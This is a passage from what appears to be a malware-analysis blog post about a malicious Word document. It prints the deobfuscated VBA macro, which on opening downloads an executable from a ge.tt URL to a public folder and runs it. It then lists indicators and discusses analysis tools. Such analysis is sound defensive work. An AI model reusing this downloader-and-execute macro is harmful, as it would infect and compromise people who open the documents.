The obfuscation seems to rely on string operations. The next step is to perform all the operations on String variables, for instance:

"a" + "b" == "ab"
"c" & "" == "c"
Split(LotsofFuckingStringinallinOne)(1) == "\"

After a few such operations the code becomes much more readable:

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = "wscript."
    S_var7 = "SbieCtrl.exe"
    S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    Dim IsProgramRegistered As String: IsProgramRegistered = "wscript.s"
    S_var9 = ""
    S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
      
   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject("wscript.shell")
   Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
   End If
End Sub

Code analysis summary:

  • AutoOpen() will be executed after the document is opened.
  • ProudtoBecomeaNepaliReverseEngineer is just an alias for URLDownloadToFile().
  • URLDownloadToFile() accepts five parameters, including the URL http://ge.tt/api/1/files/2gmBurF2/0/blob?download and the file name C:\Users\Public\Documents\SbieCtrl.exe.
  • Both values serve as network and host indicators that can be used to check for a successful compromise.

Conclusions

It’s never a good idea to rely on only one tool. Analyzing malicious documents is all about finding, extracting and analyzing malicious code. What would happen if the bad guys used different obfuscation methods or document types, or came up with a new, unknown technique? Would you be prepared with your current toolset? Having a backup plan and additional tools in your toolset makes you ready for such a scenario. In our short analysis OfficeMalScanner was not able to extract both streams correctly. What if this was your go-to tool? Would you be able to perform the analysis? I am not saying that any tool described in this post is better or worse than the others; all of them are great tools that let you do things differently, and it all really depends on your requirements. For instance, officeparser.py and oledump.py allow you to interact with the file internals, but this might not be the most efficient approach if you have a few documents to analyze, where writing a loop around OfficeMalScanner or olevba.py to dump the malicious code will do the trick for you.

Never limit yourself to one tool, programming language or operating system. Be flexible and open-minded, have a backup plan, a proper toolset and you will be better prepared for the upcoming challenges!
